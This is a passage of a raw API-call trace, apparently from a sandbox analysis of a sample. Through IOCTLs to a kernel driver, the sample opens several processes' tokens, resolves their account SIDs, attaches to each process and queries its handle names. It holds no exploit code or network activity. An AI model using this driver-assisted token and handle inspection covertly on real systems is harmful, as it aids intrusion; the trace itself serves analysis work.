(Object=0xfffffa8001ee8b30) returned 0x12 [0152.845] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a5044, ReturnLength=0xfffff88005163550) returned 0x0 [0152.845] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0152.845] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.845] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x694) returned 0xc8 [0152.845] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0152.845] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f45b30, HandleInformation=0x0) returned 0x0 [0152.846] ObOpenObjectByPointer (in: Object=0xfffffa8001f45b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0152.846] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x14 [0152.846] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8001eb4ec0 | out: TokenHandle=0xfffffa8001eb4ec0*=0xc4) returned 0x0 [0152.846] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0152.846] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.846] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0152.846] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0154.457] CloseHandle (hObject=0xc4) returned 1 [0154.457] CloseHandle (hObject=0xc8) returned 1 [0154.457] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.457] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0154.457] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.457] PsAcquireProcessExitSynchronization () returned 0x0 [0154.457] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880051635d0) [0154.458] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f42dd0, HandleInformation=0x0) returned 0x0 [0154.458] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.458] PsReleaseProcessExitSynchronization () returned 0x2 [0154.458] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0154.458] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800300b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800300b044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.458] ObfDereferenceObject (Object=0xfffffa8001f42dd0) returned 0x1 [0154.458] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.458] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.458] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.458] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0154.459] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.459] PsAcquireProcessExitSynchronization () returned 0x0 [0154.459] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880051635d0) [0154.459] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80019de810, HandleInformation=0x0) returned 0x0 [0154.459] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.459] PsReleaseProcessExitSynchronization () returned 0x2 [0154.459] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0154.459] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ffe044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ffe044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.459] ObfDereferenceObject (Object=0xfffffa80019de810) returned 0x1 [0154.459] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.459] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.459] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.460] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0154.460] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.460] PsAcquireProcessExitSynchronization () returned 0x0 [0154.460] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880051635d0) [0154.460] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0154.460] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.460] PsReleaseProcessExitSynchronization () returned 0x2 [0154.460] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0154.460] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ffd484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ffd484, ReturnLength=0xfffff88005163550) returned 0x0 [0154.460] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0154.460] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.460] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x734) returned 0xc8 [0154.461] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0154.461] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f99b30, HandleInformation=0x0) returned 0x0 [0154.461] ObOpenObjectByPointer (in: Object=0xfffffa8001f99b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0154.461] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x14 [0154.461] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80019db300 | out: TokenHandle=0xfffffa80019db300*=0xc4) returned 0x0 [0154.461] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0154.461] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.462] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0154.462] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0154.464] CloseHandle (hObject=0xc4) returned 1 [0154.464] CloseHandle (hObject=0xc8) returned 1 [0154.465] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.465] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0154.465] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.465] PsAcquireProcessExitSynchronization () returned 0x0 [0154.465] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880051635d0) [0154.465] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f6c6e0, HandleInformation=0x0) returned 0x0 [0154.465] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.465] PsReleaseProcessExitSynchronization () returned 0x2 [0154.465] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0154.465] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030aa044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030aa044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.465] ObfDereferenceObject (Object=0xfffffa8001f6c6e0) returned 0x1 [0154.466] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.466] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.466] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.466] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0154.466] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.466] PsAcquireProcessExitSynchronization () returned 0x0 [0154.466] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880051635d0) [0154.466] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f6cf20, HandleInformation=0x0) returned 0x0 [0154.466] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.466] PsReleaseProcessExitSynchronization () returned 0x2 [0154.466] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0154.466] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f28044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f28044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.467] ObfDereferenceObject (Object=0xfffffa8001f6cf20) returned 0x1 [0154.467] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.467] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.467] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.467] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0154.467] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.467] PsAcquireProcessExitSynchronization () returned 0x0 [0154.467] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880051635d0) [0154.467] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0154.467] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.467] PsReleaseProcessExitSynchronization () returned 0x2 [0154.467] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0154.467] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002f9d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9d044, ReturnLength=0xfffff88005163550) returned 0x0 [0154.468] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0154.468] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.468] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xc8 [0154.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0154.468] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800ea389f0, HandleInformation=0x0) returned 0x0 [0154.468] ObOpenObjectByPointer (in: Object=0xfffffa800ea389f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0154.468] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x14 [0154.468] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80019db300 | out: TokenHandle=0xfffffa80019db300*=0xc4) returned 0x0 [0154.468] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0154.468] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.469] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0154.469] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0154.472] CloseHandle (hObject=0xc4) returned 1 [0154.472] CloseHandle (hObject=0xc8) returned 1 [0154.472] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.472] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0154.472] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.472] PsAcquireProcessExitSynchronization () returned 0x0 [0154.472] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880051635d0) [0154.472] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a199a0, HandleInformation=0x0) returned 0x0 [0154.472] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.473] PsReleaseProcessExitSynchronization () returned 0x2 [0154.473] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0154.473] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff6044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.473] ObfDereferenceObject (Object=0xfffffa8003a199a0) returned 0x1 [0154.473] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.473] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.473] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.473] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0154.473] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.473] PsAcquireProcessExitSynchronization () returned 0x0 [0154.473] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880051635d0) [0154.473] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003914330, HandleInformation=0x0) returned 0x0 [0154.473] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.474] PsReleaseProcessExitSynchronization () returned 0x2 [0154.474] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0154.474] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.474] ObfDereferenceObject (Object=0xfffffa8003914330) returned 0x1 [0154.474] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.474] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.474] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.474] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0154.474] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.474] PsAcquireProcessExitSynchronization () returned 0x0 [0154.474] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880051635d0) [0154.474] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0154.474] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.474] PsReleaseProcessExitSynchronization () returned 0x2 [0154.474] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0154.475] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0154.475] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0154.475] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.475] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0xc8 [0154.475] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0154.475] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f52310, HandleInformation=0x0) returned 0x0 [0154.475] ObOpenObjectByPointer (in: Object=0xfffffa8001f52310, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0154.475] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x14 [0154.475] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80019db300 | out: TokenHandle=0xfffffa80019db300*=0xc4) returned 0x0 [0154.476] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0154.476] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.476] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0154.476] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0154.478] CloseHandle (hObject=0xc4) returned 1 [0154.479] CloseHandle (hObject=0xc8) returned 1 [0154.479] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0154.479] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.479] PsAcquireProcessExitSynchronization () returned 0x0 [0154.479] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880051635d0) [0154.479] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8010db15d0, HandleInformation=0x0) returned 0x0 [0154.479] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.479] PsReleaseProcessExitSynchronization () returned 0x2 [0154.479] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0154.479] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.480] ObfDereferenceObject (Object=0xfffffa8010db15d0) returned 0x1 [0154.480] IofCompleteRequest (Irp=0xfffffa800c187a90, 